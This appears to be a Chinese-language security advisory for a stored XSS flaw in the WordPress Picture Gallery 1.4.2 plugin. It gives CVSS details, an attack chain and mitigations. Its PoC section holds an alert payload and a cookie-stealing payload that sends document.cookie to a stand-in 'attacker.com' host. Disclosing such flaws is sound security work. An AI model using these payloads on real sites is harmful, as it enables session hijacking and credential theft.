CVE-2021-47951 CVSS 6.4 中危

CVE-2021-47951 WordPress Picture Gallery 存储型XSS漏洞

披露日期: 2026-05-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2021-47951

漏洞类型

存储型跨站脚本攻击

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Picture Gallery

漏洞概述

WordPress Picture Gallery 1.4.2 版本存在存储型跨站脚本（XSS）漏洞。该漏洞是由于插件在“访问控制”设置的“Edit Content URL”字段中未对用户输入进行充分过滤导致的。经过身份验证的攻击者可以注入恶意脚本，这些脚本被存储在数据库中，当管理员或其他用户访问相关功能时触发，从而导致会话劫持或凭证窃取。

技术细节

该漏洞源于 WordPress Picture Gallery 插件在处理“访问控制”设置中的“Edit Content URL”字段时，未对输入数据进行严格的转义或验证。攻击者需拥有较低的权限账户（如订阅者或作者），登录后台后访问插件设置页面。在“Edit Content URL”输入框中注入恶意的 JavaScript 代码（例如 `<script>alert(document.cookie)</script>`）。由于数据未经过滤直接存储到数据库中，当管理员或其他用户访问该插件的管理面板或触发特定功能时，存储的恶意脚本将在受害者浏览器上下文中执行。利用 CVSS 向量中的范围改变（S:C），攻击者可以借此绕过同源策略，窃取管理员的 Session ID、Cookie 凭证，甚至利用管理员权限进行进一步的操作，如上传 Webshell 或篡改网站内容。

攻击链分析

STEP 1

步骤1

攻击者注册或获取一个WordPress低权限账户（如订阅者）。

STEP 2

步骤2

登录WordPress后台，导航至Picture Gallery插件的设置页面。

STEP 3

步骤3

在“Access Control”设置的“Edit Content URL”字段中输入JavaScript恶意payload并保存。

STEP 4

步骤4

恶意payload被存储在网站的数据库中。

STEP 5

步骤5

管理员或其他用户访问包含该字段的插件页面。

STEP 6

步骤6

浏览器解析存储的恶意脚本并执行，攻击者获取敏感信息或权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for Stored XSS in Edit Content URL field -->
<!-- Payload to inject: -->
"><script>alert('CVE-2021-47951 XSS');</script>

<!-- Stealthier payload to steal cookies (replace attacker.com with listener): -->
"><img src=x onerror="this.src='http://attacker.com/?c='+document.cookie">

影响范围

WordPress Picture Gallery 1.4.2

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 WordPress Picture Gallery 插件，或通过 Web 应用防火墙（WAF）配置规则，拦截针对插件设置页面的包含恶意脚本标签的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表